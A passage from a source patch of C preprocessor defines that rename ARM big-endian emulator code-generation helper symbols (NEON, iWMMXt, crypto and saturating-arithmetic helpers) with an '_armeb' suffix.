gen_bx_im_armeb +#define gen_clrex gen_clrex_armeb +#define generate_memory_topology generate_memory_topology_armeb +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_armeb +#define gen_exception gen_exception_armeb +#define gen_exception_insn gen_exception_insn_armeb +#define gen_exception_internal gen_exception_internal_armeb +#define gen_exception_internal_insn gen_exception_internal_insn_armeb +#define gen_exception_return gen_exception_return_armeb +#define gen_goto_tb gen_goto_tb_armeb +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_armeb +#define gen_helper_add_saturate gen_helper_add_saturate_armeb +#define gen_helper_add_setq gen_helper_add_setq_armeb +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_armeb +#define gen_helper_clz32 gen_helper_clz32_armeb +#define gen_helper_clz64 gen_helper_clz64_armeb +#define gen_helper_clz_arm gen_helper_clz_arm_armeb +#define gen_helper_cpsr_read gen_helper_cpsr_read_armeb +#define gen_helper_cpsr_write gen_helper_cpsr_write_armeb +#define gen_helper_crc32_arm gen_helper_crc32_arm_armeb +#define gen_helper_crc32c gen_helper_crc32c_armeb +#define gen_helper_crypto_aese gen_helper_crypto_aese_armeb +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_armeb +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_armeb +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_armeb +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_armeb +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_armeb +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_armeb +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_armeb +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_armeb +#define gen_helper_double_saturate gen_helper_double_saturate_armeb +#define gen_helper_exception_internal gen_helper_exception_internal_armeb +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_armeb +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_armeb +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_armeb +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_armeb +#define gen_helper_get_user_reg gen_helper_get_user_reg_armeb +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_armeb +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_armeb +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_armeb +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_armeb +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_armeb +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_armeb +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_armeb +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_armeb +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_armeb +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_armeb +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_armeb +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_armeb +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_armeb +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_armeb +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_armeb +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_armeb +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_armeb +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_armeb +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_armeb +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_armeb +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_armeb +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_armeb +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_armeb +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_armeb +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_armeb +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_armeb +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_armeb +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_armeb +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_armeb +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_armeb +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_armeb +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_armeb +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_armeb +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_armeb +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_armeb +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_armeb +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_armeb +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_armeb +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_armeb +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_armeb +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_armeb +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_armeb +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_armeb +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_armeb +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_armeb +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_armeb +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_armeb +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_armeb +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_armeb +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_armeb +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_armeb +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_armeb +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_armeb +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_armeb +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_armeb +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_armeb +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_armeb +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_armeb +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_armeb +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_armeb +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_armeb +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_armeb +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_armeb +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_armeb +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_armeb +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_armeb +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_armeb +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_armeb +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_armeb +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_armeb +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_armeb +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_armeb +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_armeb +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_armeb +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_armeb +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_armeb +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_armeb +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_armeb +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_armeb +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_armeb +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_armeb +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_armeb +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_armeb +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_armeb +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_armeb +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_armeb +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_armeb +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_armeb +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_armeb +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_armeb +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_armeb +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_armeb +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_armeb +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_armeb +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_armeb +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_armeb +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_armeb +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_armeb +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_armeb +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_armeb +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_armeb +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_armeb +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_armeb +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_armeb +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_armeb +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_armeb +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_armeb +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_armeb +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_armeb +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_armeb +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_armeb +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_armeb +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_armeb +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_armeb +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_armeb +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_armeb +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_armeb +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_armeb +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_armeb +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_armeb +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_armeb +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_armeb +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_armeb +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_armeb +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_armeb +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_armeb +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_armeb +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_armeb +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_armeb +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_armeb +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_armeb +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_armeb +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_armeb +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_armeb +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_armeb +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_armeb +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_armeb +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_armeb +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_armeb +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_armeb +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_armeb +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_armeb +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_armeb +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_armeb +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_armeb +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_armeb +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_armeb +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_armeb +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_armeb +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_armeb +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_armeb +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_armeb +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_armeb +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_armeb +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_armeb +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_armeb +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_armeb +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_armeb +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_armeb +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_armeb +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_armeb +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_armeb +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_armeb +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_armeb +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_armeb +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_armeb +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_armeb +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_armeb +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_armeb +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_armeb +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_armeb +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_armeb +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_armeb +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_armeb +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_armeb +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_armeb +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_armeb +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_armeb +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_armeb +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_armeb +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_armeb +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_armeb +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_armeb +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_armeb +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_armeb +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_armeb +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_armeb +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_armeb +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_armeb +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_armeb +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_armeb +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_armeb +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_armeb +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_armeb +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_armeb +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_armeb +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_armeb +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_armeb +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_armeb +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_armeb +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_armeb +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_armeb +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_armeb +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_armeb +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_armeb +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_armeb +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_armeb +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_armeb +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_armeb +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_armeb +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_armeb +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_armeb +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_armeb +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_armeb +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_armeb +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_armeb +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_armeb +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_armeb +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_armeb +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_armeb +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_armeb +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_armeb +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_armeb +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_armeb +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_armeb +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_armeb +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_armeb +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_armeb +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_armeb +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_armeb +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_armeb +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_armeb +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_armeb +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_armeb +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_armeb +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_armeb +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_armeb +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_armeb +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_armeb +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_armeb +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_armeb +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_armeb +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_armeb +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_armeb +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_armeb +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_armeb +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_armeb +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_armeb +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_armeb +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_armeb +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_armeb +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_armeb +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_armeb +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_armeb +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_armeb +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_armeb +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_armeb +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_armeb +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_armeb +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_armeb +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_armeb +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_armeb +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_armeb +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_armeb +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_armeb +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_armeb +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_armeb +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_armeb +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_armeb +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_armeb +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_armeb +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_armeb +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_armeb +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_armeb +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_armeb +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_armeb +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_armeb +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_armeb +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_armeb +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_armeb +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_armeb +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_armeb +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_armeb +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_armeb +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_armeb +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_armeb +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_armeb +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_armeb +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_armeb +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_armeb +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_armeb +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_armeb +#define gen_helper_neon_tbl gen_helper_neon_tbl_armeb +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_armeb +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_armeb +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_armeb +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_armeb +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_armeb +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_armeb +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_armeb +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_armeb +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_armeb +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_armeb +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_armeb +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_armeb +#define gen_helper_neon_zip16 gen_helper_neon_zip16_armeb +#define gen_helper_neon_zip8 gen_helper_neon_zip8_armeb +#define gen_helper_pre_hvc gen_helper_pre_hvc_armeb +#define gen_helper_pre_smc gen_helper_pre_smc_armeb +#define gen_helper_qadd16 gen_helper_qadd16_armeb +#define gen_helper_qadd8 gen_helper_qadd8_armeb +#define gen_helper_qaddsubx gen_helper_qaddsubx_armeb +#define gen_helper_qsub16 gen_helper_qsub16_armeb +#define gen_helper_qsub8 gen_helper_qsub8_armeb +#define gen_helper_qsubaddx gen_helper_qsubaddx_armeb +#define gen_helper_rbit gen_helper_rbit_armeb +#define gen_helper_recpe_f32 gen_helper_recpe_f32_armeb +#define gen_helper_recpe_u32 gen_helper_recpe_u32_armeb +#define gen_helper_recps_f32 gen_helper_recps_f32_armeb +#define gen_helper_rintd gen_helper_rintd_armeb +#define gen_helper_rintd_exact gen_helper_rintd_exact_armeb +#define gen_helper_rints gen_helper_rints_armeb +#define gen_helper_rints_exact gen_helper_rints_exact_armeb +#define gen_helper_ror_cc gen_helper_ror_cc_armeb +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_armeb +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_armeb +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_armeb +#define gen_helper_sadd16 gen_helper_sadd16_armeb +#define gen_helper_sadd8 gen_helper_sadd8_armeb +#define gen_helper_saddsubx gen_helper_saddsubx_armeb +#define gen_helper_sar_cc gen_helper_sar_cc_armeb +#define gen_helper_sdiv gen_helper_sdiv_armeb +#define gen_helper_sel_flags gen_helper_sel_flags_armeb +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_armeb +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_armeb +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_armeb +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_armeb +#define gen_helper_set_rmode gen_helper_set_rmode_armeb +#define gen_helper_set_user_reg gen_helper_set_user_reg_armeb +#define gen_helper_shadd16 gen_helper_shadd16_armeb +#define gen_helper_shadd8 gen_helper_shadd8_armeb +#define gen_helper_shaddsubx gen_helper_shaddsubx_armeb +#define gen_helper_shl_cc gen_helper_shl_cc_armeb +#define gen_helper_shr_cc gen_helper_shr_cc_armeb +#define gen_helper_shsub16 gen_helper_shsub16_armeb +#define gen_helper_shsub8 gen_helper_shsub8_armeb +#define gen_helper_shsubaddx gen_helper_shsubaddx_armeb +#define gen_helper_ssat gen_helper_ssat_armeb +#define gen_helper_ssat16 gen_helper_ssat16_armeb +#define gen_helper_ssub16 gen_helper_ssub16_armeb +#define gen_helper_ssub8 gen_helper_ssub8_armeb +#define gen_helper_ssubaddx gen_helper_ssubaddx_armeb +#define gen_helper_sub_saturate gen_helper_sub_saturate_armeb +#define gen_helper_sxtb16 gen_helper_sxtb16_armeb +#define gen_helper_uadd16 gen_helper_uadd16_armeb +#define gen_helper_uadd8 gen_helper_uadd8_armeb +#define gen_helper_uaddsubx gen_helper_uaddsubx_armeb +#define gen_helper_udiv gen_helper_udiv_armeb +#define gen_helper_uhadd16 gen_helper_uhadd16_armeb +#define gen_helper_uhadd8 gen_helper_uhadd8_armeb +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_armeb +#define gen_helper_uhsub16 gen_helper_uhsub16_armeb +#define gen_helper_uhsub8 gen_helper_uhsub8_armeb +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_armeb +#define gen_helper_uqadd16 gen_helper_uqadd16_armeb +#define gen_helper_uqadd8 gen_helper_uqadd8_armeb +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_armeb +#define gen_helper_uqsub16 gen_helper_uqsub16_armeb +#define gen_helper_uqsub8 gen_helper_uqsub8_armeb +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_armeb +#define gen_helper_usad8 gen_helper_usad8_armeb +#define gen_helper_usat gen_helper_usat_armeb +#define gen_helper_usat16 gen_helper_usat16_armeb +#define gen_helper_usub16 gen_helper_usub16_armeb +#define 